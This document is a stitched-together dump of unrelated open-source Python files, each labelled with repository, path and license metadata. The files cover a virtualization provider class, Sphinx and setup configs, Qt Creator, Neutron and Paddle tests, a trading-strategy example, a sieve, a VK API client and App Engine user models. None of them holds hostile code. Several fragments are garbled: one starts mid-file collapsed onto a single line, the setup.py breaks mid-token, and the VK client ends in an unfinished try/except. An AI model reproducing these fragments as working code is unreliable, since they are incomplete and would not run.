vm_network = LineChart(id='miq_chart_parent_candu_3') @attr.s(hash=False) class RHEVMProvider(InfraProvider): catalog_item_type = RHVCatalogItem vm_utilization_view = RHEVMVMUtilizationView type_name = "rhevm" mgmt_class = RHEVMSystem db_types = ["Redhat::InfraManager"] endpoints_form = RHEVMEndpointForm discover_dict = {"rhevm": True} settings_key = 'ems_redhat' # xpath locators for elements, to be used by selenium _console_connection_status_element = '//*[@id="connection-status"]|//*[@id="message-div"]' _canvas_element = '(//*[@id="remote-console"]/canvas|//*[@id="spice-screen"]/canvas)' _ctrl_alt_del_xpath = '//*[@id="ctrlaltdel"]' _fullscreen_xpath = '//*[@id="fullscreen"]' bad_credentials_error_msg = "Credential validation was not successful" ems_events = [ ('vm_create', {'event_type': 'USER_ADD_VM_FINISHED_SUCCESS', 'vm_or_template_id': None}), ('vm_stop', {'event_type': 'USER_STOP_VM', 'vm_or_template_id': None}), ('vm_start', {'event_type': 'USER_RUN_VM', 'vm_or_template_id': None}), ('vm_delete', {'event_type': 'USER_REMOVE_VM_FINISHED', 'vm_or_template_id': None}) ] @property def view_value_mapping(self): return { 'name': self.name, 'prov_type': 'Red Hat Virtualization' } def deployment_helper(self, deploy_args): """ Used in utils.virtual_machines """ if 'default_cluster' not in deploy_args: return {'cluster': self.data['default_cluster']} return {} @classmethod def from_config(cls, prov_config, prov_key): endpoints = {} for endp in prov_config['endpoints']: for expected_endpoint in (RHEVMEndpoint, CANDUEndpoint): if expected_endpoint.name == endp: endpoints[endp] = expected_endpoint(**prov_config['endpoints'][endp]) if prov_config.get('discovery_range'): start_ip = prov_config['discovery_range']['start'] end_ip = prov_config['discovery_range']['end'] else: start_ip = end_ip = prov_config.get('ipaddress') return cls.appliance.collections.infra_providers.instantiate( prov_class=cls, name=prov_config['name'], endpoints=endpoints, zone=prov_config.get('server_zone', 'default'), key=prov_key, start_ip=start_ip, end_ip=end_ip) # Following methods will only work if the remote console window is open # and if selenium focused on it. 
These will not work if the selenium is # focused on Appliance window. def get_console_connection_status(self): try: return self.appliance.browser.widgetastic.selenium.find_element_by_xpath( self._console_connection_status_element).text except: raise ItemNotFound("Element not found on screen, is current focus on console window?") def get_remote_console_canvas(self): try: return self.appliance.browser.widgetastic.selenium.find_element_by_xpath( self._canvas_element) except: raise ItemNotFound("Element not found on screen, is current focus on console window?") def get_console_ctrl_alt_del_btn(self): try: return self.appliance.browser.widgetastic.selenium.find_element_by_xpath( self._ctrl_alt_del_xpath) except: raise ItemNotFound("Element not found on screen, is current focus on console window?") def get_console_fullscreen_btn(self): try: return self.appliance.browser.widgetastic.selenium.find_element_by_xpath( self._fullscreen_xpath) except: raise ItemNotFound("Element not found on screen, is current focus on console window?")
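A hedged, self-contained sketch of the attrs idiom used for the provider class above; the Endpoint class here is illustrative, not the project's:

import attr

@attr.s(hash=False)
class Endpoint(object):
    name = attr.ib()
    hostname = attr.ib(default=None)

ep = Endpoint(name='default', hostname='rhv.example.com')
print(ep)  # Endpoint(name='default', hostname='rhv.example.com')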
EndPointCorp/lg_ros_nodes
lg_keyboard/setup.py
Python
apache-2.0
309
0
#!/usr/bin/env python3 from dis
tutils.core import setup from catkin_pkg.python_setup import generate_distutils_setup d = generate_distutils_setup( packages=['lg_keyboard'], package_dir={'': 'src'}, scripts=[], requires=[] ) setu
p(**d) # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
p5a0u9l/clamm
doc/conf.py
Python
mit
4,816
0.000208
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# clamm documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 2 20:47:20 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../clamm'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.coverage',
    'sphinx.ext.napoleon']

napoleon_numpy_docstring = True

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = 'clamm'
copyright = '2017, Paul Adams'
author = 'Paul Adams'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False

# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# -- Options for HTMLHelp output ------------------------------------------

# Output file base name for HTML help builder.
htmlhelp_basename = 'clammdoc'

# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',

    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'clamm.tex', 'clamm Documentation',
     'Paul Adams', 'manual'),
]

# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'clamm', 'clamm Documentation',
     [author], 1)
]

# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'clamm', 'clamm Documentation',
     author, 'clamm', 'One line description of project.',
     'Miscellaneous'),
]
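With a conf.py like this, the docs can be built programmatically as well as with the sphinx-build CLI. A sketch, assuming Sphinx >= 1.7 (where sphinx.cmd.build.build_main exists) and that this file lives in doc/:

    from sphinx.cmd.build import build_main

    # Equivalent to: sphinx-build -b html doc doc/_build/html
    build_main(["-b", "html", "doc", "doc/_build/html"])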
kuba1/qtcreator
tests/system/suite_general/tst_build_speedcrunch/test.py
Python
lgpl-2.1
3,768
0.008493
#############################################################################
##
## Copyright (C) 2015 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms and
## conditions see http://www.qt.io/terms-conditions. For further information
## use the contact form at http://www.qt.io/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 or version 3 as published by the Free
## Software Foundation and appearing in the file LICENSE.LGPLv21 and
## LICENSE.LGPLv3 included in the packaging of this file. Please review the
## following information to ensure the GNU Lesser General Public License
## requirements will be met: https://www.gnu.org/licenses/lgpl.html and
## http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, The Qt Company gives you certain additional
## rights. These rights are described in The Qt Company LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################

source("../../shared/qtcreator.py")

import re

SpeedCrunchPath = ""

def buildConfigFromFancyToolButton(fancyToolButton):
    beginOfBuildConfig = "<b>Build:</b> "
    endOfBuildConfig = "<br/><b>Deploy:</b>"
    toolTipText = str(fancyToolButton.toolTip)
    beginIndex = toolTipText.find(beginOfBuildConfig) + len(beginOfBuildConfig)
    endIndex = toolTipText.find(endOfBuildConfig)
    return toolTipText[beginIndex:endIndex]

def main():
    if not neededFilePresent(SpeedCrunchPath):
        return
    startApplication("qtcreator" + SettingsPath)
    if not startedWithoutPluginError():
        return

    suitableKits = Targets.DESKTOP_480_GCC
    if platform.system() in ('Windows', 'Microsoft'):
        suitableKits |= Targets.DESKTOP_480_MSVC2010
    checkedTargets = openQmakeProject(SpeedCrunchPath, suitableKits)
    progressBarWait(30000)

    fancyToolButton = waitForObject(":*Qt Creator_Core::Internal::FancyToolButton")

    availableConfigs = iterateBuildConfigs(len(checkedTargets), "Release")
    if not availableConfigs:
        test.fatal("Haven't found a suitable Qt version (need Release build) - leaving without building.")
    for kit, config in availableConfigs:
        selectBuildConfig(len(checkedTargets), kit, config)
        buildConfig = buildConfigFromFancyToolButton(fancyToolButton)
        if buildConfig != config:
            test.fatal("Build configuration %s is selected instead of %s" % (buildConfig, config))
            continue
        test.log("Testing build configuration: " + config)
        if not JIRA.isBugStillOpen(13700):
            invokeMenuItem("Build", "Run qmake")
            waitForCompile()
        invokeMenuItem("Build", "Rebuild All")
        waitForCompile(300000)
        checkCompile()
        checkLastBuild()

    # Add a new run configuration

    invokeMenuItem("File", "Exit")

def init():
    global SpeedCrunchPath
    SpeedCrunchPath = os.path.join(srcPath, "creator-test-data", "speedcrunch", "src", "speedcrunch.pro")
    cleanup()

def cleanup():
    # Make sure the .user files are gone
    cleanUpUserFiles(SpeedCrunchPath)
    for dir in glob.glob(os.path.join(srcPath, "creator-test-data", "speedcrunch", "speedcrunch-build-*")):
        deleteDirIfExists(dir)
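The slicing logic of buildConfigFromFancyToolButton is plain string work and can be checked in isolation; the tooltip text below is a made-up illustration of the shape the function expects:

    tip = "<b>Project:</b> speedcrunch<br/><b>Build:</b> Release<br/><b>Deploy:</b> local"
    begin = "<b>Build:</b> "
    end = "<br/><b>Deploy:</b>"
    config = tip[tip.find(begin) + len(begin):tip.find(end)]
    print(config)  # Release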
Pyangs/ShiPanE-Python-SDK
examples/joinquant/simple_strategy.py
Python
mit
911
0.001473
import shipane_sdk

# Initialization function: set the stock to trade, the benchmark, and so on.
def initialize(context):
    # Define a global variable to hold the stock to trade.
    # 000001 (stock: Ping An Bank)
    g.security = '000001.XSHE'
    # Use the CSI 300 index as the benchmark.
    set_benchmark('000300.XSHG')

def process_initialize(context):
    # Create the StrategyManager object.
    # The argument is the manager id from the configuration file.
    g.__manager = shipane_sdk.JoinQuantStrategyManagerFactory(context).create('manager-1')

# Called once per unit of time (once per day when backtesting by day,
# once per minute when backtesting by minute).
def handle_data(context, data):
    # Keep the order object.
    order_ = order(g.security, 100)
    # ShiPanE (实盘易) places the live order based on JoinQuant's order object.
    g.__manager.execute(order_)

    order_ = order(g.security, -100)
    g.__manager.execute(order_)
    # Cancel the order.
    g.__manager.cancel(order_)
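JoinQuant's order() can return None when an order cannot be created (for example, when funds are insufficient), so a guard before execute() keeps None away from the manager. A defensive sketch using the same names as above:

    def handle_data(context, data):
        order_ = order(g.security, 100)
        if order_ is not None:
            g.__manager.execute(order_)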
javaos74/neutron
neutron/tests/unit/api/rpc/handlers/test_resources_rpc.py
Python
apache-2.0
8,869
0.000338
# Copyright (c) 2015 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import mock
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
import testtools

from neutron.api.rpc.callbacks import resources
from neutron.api.rpc.handlers import resources_rpc
from neutron.common import topics
from neutron import context
from neutron.objects import base as objects_base
from neutron.tests import base


def _create_test_dict():
    return {'id': 'uuid', 'field': 'foo'}


def _create_test_resource(context=None):
    resource_dict = _create_test_dict()
    resource = FakeResource(context, **resource_dict)
    resource.obj_reset_changes()
    return resource


@obj_base.VersionedObjectRegistry.register
class FakeResource(objects_base.NeutronObject):

    fields = {
        'id': obj_fields.UUIDField(),
        'field': obj_fields.StringField()
    }

    @classmethod
    def get_objects(cls, context, **kwargs):
        return list()


class ResourcesRpcBaseTestCase(base.BaseTestCase):

    def setUp(self):
        super(ResourcesRpcBaseTestCase, self).setUp()
        self.context = context.get_admin_context()


class _ValidateResourceTypeTestCase(base.BaseTestCase):

    def setUp(self):
        super(_ValidateResourceTypeTestCase, self).setUp()
        self.is_valid_mock = mock.patch.object(
            resources_rpc.resources, 'is_valid_resource_type').start()

    def test_valid_type(self):
        self.is_valid_mock.return_value = True
        resources_rpc._validate_resource_type('foo')

    def test_invalid_type(self):
        self.is_valid_mock.return_value = False
        with testtools.ExpectedException(
                resources_rpc.InvalidResourceTypeClass):
            resources_rpc._validate_resource_type('foo')


class _ResourceTypeVersionedTopicTestCase(base.BaseTestCase):

    @mock.patch.object(resources_rpc, '_validate_resource_type')
    def test_resource_type_versioned_topic(self, validate_mock):
        obj_name = FakeResource.obj_name()
        expected = topics.RESOURCE_TOPIC_PATTERN % {
            'resource_type': 'FakeResource', 'version': '1.0'}
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            observed = resources_rpc.resource_type_versioned_topic(obj_name)
        self.assertEqual(expected, observed)


class ResourcesPullRpcApiTestCase(ResourcesRpcBaseTestCase):

    def setUp(self):
        super(ResourcesPullRpcApiTestCase, self).setUp()
        mock.patch.object(resources_rpc, '_validate_resource_type').start()
        mock.patch('neutron.api.rpc.callbacks.resources.get_resource_cls',
                   return_value=FakeResource).start()
        self.rpc = resources_rpc.ResourcesPullRpcApi()
        mock.patch.object(self.rpc, 'client').start()
        self.cctxt_mock = self.rpc.client.prepare.return_value

    def test_is_singleton(self):
        self.assertIs(self.rpc, resources_rpc.ResourcesPullRpcApi())

    def test_pull(self):
        expected_obj = _create_test_resource(self.context)
        resource_id = expected_obj.id
        self.cctxt_mock.call.return_value = expected_obj.obj_to_primitive()

        result = self.rpc.pull(
            self.context, FakeResource.obj_name(), resource_id)

        self.cctxt_mock.call.assert_called_once_with(
            self.context, 'pull', resource_type='FakeResource',
            version=FakeResource.VERSION, resource_id=resource_id)
        self.assertEqual(expected_obj, result)

    def test_pull_resource_not_found(self):
        resource_dict = _create_test_dict()
        resource_id = resource_dict['id']
        self.cctxt_mock.call.return_value = None
        with testtools.ExpectedException(resources_rpc.ResourceNotFound):
            self.rpc.pull(self.context, FakeResource.obj_name(),
                          resource_id)


class ResourcesPullRpcCallbackTestCase(ResourcesRpcBaseTestCase):

    def setUp(self):
        super(ResourcesPullRpcCallbackTestCase, self).setUp()
        self.callbacks = resources_rpc.ResourcesPullRpcCallback()
        self.resource_obj = _create_test_resource(self.context)

    def test_pull(self):
        resource_dict = _create_test_dict()
        with mock.patch.object(
                resources_rpc.prod_registry, 'pull',
                return_value=self.resource_obj) as registry_mock:
            primitive = self.callbacks.pull(
                self.context, resource_type=FakeResource.obj_name(),
                version=FakeResource.VERSION,
                resource_id=self.resource_obj.id)
        registry_mock.assert_called_once_with(
            'FakeResource', self.resource_obj.id, context=self.context)
        self.assertEqual(resource_dict, primitive['versioned_object.data'])
        self.assertEqual(self.resource_obj.obj_to_primitive(), primitive)

    @mock.patch.object(FakeResource, 'obj_to_primitive')
    def test_pull_no_backport_for_latest_version(self, to_prim_mock):
        with mock.patch.object(resources_rpc.prod_registry, 'pull',
                               return_value=self.resource_obj):
            self.callbacks.pull(
                self.context, resource_type=FakeResource.obj_name(),
                version=FakeResource.VERSION,
                resource_id=self.resource_obj.id)
            to_prim_mock.assert_called_with(target_version=None)

    @mock.patch.object(FakeResource, 'obj_to_primitive')
    def test_pull_backports_to_older_version(self, to_prim_mock):
        with mock.patch.object(resources_rpc.prod_registry, 'pull',
                               return_value=self.resource_obj):
            self.callbacks.pull(
                self.context,
                resource_type=FakeResource.obj_name(),
                version='0.9',  # less than initial version 1.0
                resource_id=self.resource_obj.id)
            to_prim_mock.assert_called_with(target_version='0.9')


class ResourcesPushRpcApiTestCase(ResourcesRpcBaseTestCase):

    def setUp(self):
        super(ResourcesPushRpcApiTestCase, self).setUp()
        mock.patch.object(resources_rpc.n_rpc, 'get_client').start()
        mock.patch.object(resources_rpc, '_validate_resource_type').start()
        self.rpc = resources_rpc.ResourcesPushRpcApi()
        self.cctxt_mock = self.rpc.client.prepare.return_value
        self.resource_obj = _create_test_resource(self.context)

    def test__prepare_object_fanout_context(self):
        expected_topic = topics.RESOURCE_TOPIC_PATTERN % {
            'resource_type': resources.get_resource_type(self.resource_obj),
            'version': self.resource_obj.VERSION}
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            observed = self.rpc._prepare_object_fanout_context(
                self.resource_obj)
        self.rpc.client.prepare.assert_called_once_with(
            fanout=True, topic=expected_topic)
        self.assertEqual(self.cctxt_mock, observed)

    def test_pushy(self):
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            self.rpc.push(
                self.context, self.resource_obj, 'TYPE')
        self.cctxt_mock.cast.assert_called_once_with(
            self.context, 'push',
            resource=self.resource_obj.obj_to_primitive(),
            event_type='TYPE')


class ResourcesPushRpcCallbackTestCase(ResourcesRpcBaseTestCase):

    def setUp(self):
        super(ResourcesPushRpcCallbackTestCase, self).setUp()
        mock.patch.object(resource
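The topic construction these tests exercise is easy to see in isolation. A sketch, assuming the pattern has the "neutron-vo-%(resource_type)s-%(version)s" shape implied by the tests (the real value lives in neutron.common.topics):

    # Assumed pattern shape; not copied from the neutron source.
    RESOURCE_TOPIC_PATTERN = "neutron-vo-%(resource_type)s-%(version)s"

    topic = RESOURCE_TOPIC_PATTERN % {"resource_type": "FakeResource",
                                      "version": "1.0"}
    print(topic)  # neutron-vo-FakeResource-1.0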
c4goldsw/shogun
examples/undocumented/python_modular/kernel_anova_modular.py
Python
gpl-3.0
717
0.041841
#!/usr/bin/env python

traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'

parameter_list = [[traindat, testdat, 2, 10], [traindat, testdat, 5, 10]]

def kernel_anova_modular (train_fname=traindat, test_fname=testdat, cardinality=2, size_cache=10):
    from modshogun import ANOVAKernel, RealFeatures, CSVFile

    feats_train = RealFeatures(CSVFile(train_fname))
    feats_test = RealFeatures(CSVFile(test_fname))

    kernel = ANOVAKernel(feats_train, feats_train, cardinality, size_cache)
    km_train = kernel.get_kernel_matrix()

    kernel.init(feats_train, feats_test)
    km_test = kernel.get_kernel_matrix()
    return km_train, km_test, kernel

if __name__=='__main__':
    print('ANOVA')
    kernel_anova_modular(*parameter_list[0])
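For intuition about what ANOVAKernel computes: the ANOVA kernel of cardinality d is commonly defined as the sum, over all size-d index subsets, of the product of the matching coordinates of the two vectors. A brute-force sketch of that definition (not Shogun's optimized implementation):

    from itertools import combinations
    import numpy as np

    def anova_kernel_bruteforce(x, y, d):
        # K_d(x, y) = sum over all index subsets {i1 < ... < id}
        # of prod_k x[ik] * y[ik]
        return sum(np.prod([x[i] * y[i] for i in subset])
                   for subset in combinations(range(len(x)), d))

    print(anova_kernel_bruteforce(np.array([1., 2., 3.]),
                                  np.array([1., 1., 2.]), 2))  # 20.0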
vansjyo/Hacktoberfest-2k17
DhvanilP/sieve_of_erastothenes.py
Python
mit
457
0
from math import sqrt

def main():
    n = int(input("Enter n : "))
    boolArr = [True for i in range(n + 1)]
    boolArr[0] = boolArr[1] = False
    for i in range(2, int(sqrt(n) + 1)):
        if boolArr[i]:
            # i is prime; mark every multiple of i starting at i*i.
            for j in range(i * i, n + 1, i):
                boolArr[j] = False
    for i in range(2, n + 1):
        if boolArr[i]:
            print(i)

if __name__ == '__main__':
    main()
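The same sieve can be written as a reusable function that returns the primes instead of printing them; a compact variant using slice assignment for the inner loop:

    def primes_up_to(n):
        """Return all primes <= n with the sieve of Eratosthenes."""
        is_prime = [True] * (n + 1)
        is_prime[0:2] = [False, False]
        for i in range(2, int(n ** 0.5) + 1):
            if is_prime[i]:
                is_prime[i * i::i] = [False] * len(range(i * i, n + 1, i))
        return [i for i, p in enumerate(is_prime) if p]

    print(primes_up_to(30))  # [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]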
baidu/Paddle
python/paddle/fluid/tests/unittests/test_fake_quantize_op.py
Python
apache-2.0
5,508
0.000182
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import print_function

import unittest
import numpy as np
from op_test import OpTest
import paddle.fluid.core as core


class TestFakeQuantizeOp(OpTest):
    def setUp(self):
        self.op_type = "fake_quantize_abs_max"
        self.attrs = {'bit_length': 8}
        self.inputs = {'X': np.random.random((124, 240)).astype("float32"), }
        scale = np.max(np.abs(self.inputs['X'])).astype("float32")
        self.outputs = {
            'Out': np.round(self.inputs['X'] / scale * (
                (1 << (self.attrs['bit_length'] - 1)) - 1)),
            'OutScale': np.array(scale).astype("float32"),
        }

    def test_check_output(self):
        self.check_output()


class TestFakeChannelWiseQuantizeOp(OpTest):
    def setUp(self):
        self.op_type = "fake_channel_wise_quantize_abs_max"
        self.attrs = {'bit_length': 8}
        self.inputs = {
            'X': np.random.random((4, 3, 64, 64)).astype("float32"),
        }
        scales = []
        for i in range(self.inputs['X'].shape[0]):
            scales.append(np.max(np.abs(self.inputs['X'][i])).astype("float32"))
        outputs = self.inputs['X'].copy()
        for i, scale in enumerate(scales):
            outputs[i] = np.round(outputs[i] / scale * (
                (1 << (self.attrs['bit_length'] - 1)) - 1))
        self.outputs = {
            'Out': outputs,
            'OutScale': np.array(scales).astype("float32"),
        }

    def test_check_output(self):
        self.check_output()


class TestFakeQuantizeRangeAbsMaxOp(OpTest):
    def setUp(self):
        self.op_type = "fake_quantize_range_abs_max"
        self.attrs = {
            'bit_length': int(5),
            'window_size': int(1),
            'is_test': False
        }
        x = (np.random.random((8, 16, 7, 7)) - 0.5) * 10
        x = x.astype("float32")
        self.inputs = {
            'X': x,
            'Iter': np.zeros(1).astype("int64"),
            'InScale': np.zeros(1).astype("float32")
        }
        scale = np.max(np.abs(self.inputs['X'])).astype("float32")

        out_scales = np.zeros(self.attrs['window_size']).astype("float32")
        out_scales[0] = scale
        self.outputs = {
            'Out': np.round(self.inputs['X'] / scale * (
                (1 << (self.attrs['bit_length'] - 1)) - 1)),
            'OutScale': scale,
            'OutScales': out_scales,
        }

    def test_check_output(self):
        self.check_output()


class TestFakeQuantizeMovingOp(OpTest):
    def setUp(self):
        self.op_type = "fake_quantize_moving_average_abs_max"
        self.attrs = {
            'bit_length': int(5),
            'moving_rate': float(0.9),
            'is_test': False
        }
        accum = np.zeros(1).astype("float32")
        accum[0] = 1
        state = np.zeros(1).astype("float32")
        state[0] = 1
        scale = np.zeros(1).astype("float32")
        scale[0] = 0.001
        self.inputs = {
            'X': np.random.random((8, 16, 7, 7)).astype("float32"),
            'InScale': scale,
            'InAccum': accum,
            'InState': state,
        }

        out_accum = np.zeros(1).astype("float32")
        out_state = np.zeros(1).astype("float32")
        out_scale = np.zeros(1).astype("float32")
        out_accum[0] = self.attrs['moving_rate'] * accum[0] + np.max(
            np.abs(self.inputs['X'])).astype("float32")
        out_state[0] = self.attrs['moving_rate'] * state[0] + 1
        out_scale = out_accum / out_state
        self.outputs = {
            'Out': np.round(self.inputs['X'] / out_scale * (
                (1 << (self.attrs['bit_length'] - 1)) - 1)),
            'OutAccum': out_accum,
            'OutState': out_state,
            'OutScale': out_scale,
        }

    def test_check_output(self):
        self.check_output()


class TestFakeQuantizeRangeAbsMaxOp2(OpTest):
    def setUp(self):
        self.op_type = "fake_quantize_range_abs_max"
        self.attrs = {
            'bit_length': int(8),
            'window_size': int(1),
            'is_test': True
        }
        x = (np.random.random((8, 16, 7, 7)) - 0.5) * 10
        x = x.astype("float32")
        scale = np.max(np.abs(x)).astype("float32") - 1.0
        out_scales = np.zeros(self.attrs['window_size']).astype("float32")
        out_scales[0] = scale
        self.inputs = {
            'X': x,
            'Iter': np.zeros(1).astype("int64"),
            'InScale': scale.astype("float32")
        }
        xs = np.clip(x, -scale, scale)
        qs = np.round(xs / scale * ((1 << (self.attrs['bit_length'] - 1)) - 1))
        self.outputs = {
            'Out': qs,
            'OutScale': scale.astype("float32"),
            'OutScales': out_scales,
        }

    def test_check_output(self):
        self.check_output(no_check_set=set(['OutScale', 'OutScales']))


if __name__ == "__main__":
    unittest.main()
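Every test above checks the same abs-max quantization rule: q = round(x / scale * (2^(bits-1) - 1)) with scale = max|x|. A tiny worked example of that formula:

    import numpy as np

    x = np.array([-0.5, 0.25, 1.0], dtype="float32")
    bits = 8
    scale = np.max(np.abs(x))                        # 1.0
    q = np.round(x / scale * ((1 << (bits - 1)) - 1))
    print(q)                                         # [-64.  32. 127.]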
enep/vkbot
vkbot/vkapi.py
Python
gpl-3.0
1,581
0.033333
# vkapi.py
#
# Copyright 2016 Igor Unixoid Kolonchenko <enepunixoid@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#

import requests
import sys


class vkapi(object):
    redirect_url = ''
    scope = 0  # access-rights (scope) bitmask
    access_token = ''
    client_id = ''

    # Example of the OAuth URL this class builds (previously this string was
    # mistakenly assigned to client_id):
    # https://oauth.vk.com/authorize?client_id=1&display=page
    #     &redirect_uri=http://example.com/callback&scope=friends
    #     &response_type=token&v=5.57&state=123456

    def __init__(self, _ci, _ru, _scope):
        self.redirect_url = _ru  # was "==", a no-op comparison
        self.scope = _scope
        self.client_id = _ci

    def auth(self, login, passwd):
        url = "https://oauth.vk.com/authorize"
        params = {}  # was missing, causing a NameError at runtime
        params["client_id"] = self.client_id
        params["display"] = "mobile"
        params["redirect_uri"] = self.redirect_url  # was misspelled "redirecct_url"
        params["scope"] = self.scope
        params["response_type"] = "token"
        try:
            res = requests.get(url, params)
        except requests.RequestException:
            # Assumed handler: the original source is cut off at "except requests."
            return None
        return res
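A hypothetical instantiation of the class above (all values are made up; VK expects the scope as a bitmask or comma-separated permission names):

    api = vkapi(_ci="12345", _ru="https://example.com/callback", _scope="friends")
    response = api.auth("user@example.com", "secret")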
mats116/ElasticBigQuery
boilerplate/models.py
Python
lgpl-3.0
5,145
0.003304
from webapp2_extras.appengine.auth.models import User
from google.appengine.ext import ndb


class User(User):
    """
    Universal user model. Can be used with App Engine's default users API,
    own auth or third party authentication methods (OpenID, OAuth etc).
    based on https://gist.github.com/kylefinley
    """

    #: Creation date.
    created = ndb.DateTimeProperty(auto_now_add=True)
    #: Modification date.
    updated = ndb.DateTimeProperty(auto_now=True)
    #: User defined unique name, also used as key_name.
    #: Not used by OpenID.
    username = ndb.StringProperty()
    #: User Name
    name = ndb.StringProperty()
    #: User Last Name
    last_name = ndb.StringProperty()
    #: User email
    email = ndb.StringProperty()
    #: Hashed password. Only set for own authentication.
    #: Not required because third party authentication
    #: doesn't use password.
    password = ndb.StringProperty()
    #: User Country
    country = ndb.StringProperty()
    #: User TimeZone
    tz = ndb.StringProperty()
    #: Account activation verifies email.
    activated = ndb.BooleanProperty(default=False)

    @classmethod
    def get_by_email(cls, email):
        """Returns a user object based on an email.

        :param email: String representing the user email.
        :returns: A user object.
        """
        return cls.query(cls.email == email).get()

    @classmethod
    def create_resend_token(cls, user_id):
        entity = cls.token_model.create(user_id, 'resend-activation-mail')
        return entity.token

    @classmethod
    def validate_resend_token(cls, user_id, token):
        return cls.validate_token(user_id, 'resend-activation-mail', token)

    @classmethod
    def delete_resend_token(cls, user_id, token):
        cls.token_model.get_key(user_id, 'resend-activation-mail', token).delete()

    def get_social_providers_names(self):
        social_user_objects = SocialUser.get_by_user(self.key)
        result = []
        for social_user_object in social_user_objects:
            result.append(social_user_object.provider)
        return result

    def get_social_providers_info(self):
        providers = self.get_social_providers_names()
        result = {'used': [], 'unused': []}
        for k, v in SocialUser.PROVIDERS_INFO.items():
            if k in providers:
                result['used'].append(v)
            else:
                result['unused'].append(v)
        return result


class LogVisit(ndb.Model):
    user = ndb.KeyProperty(kind=User)
    uastring = ndb.StringProperty()
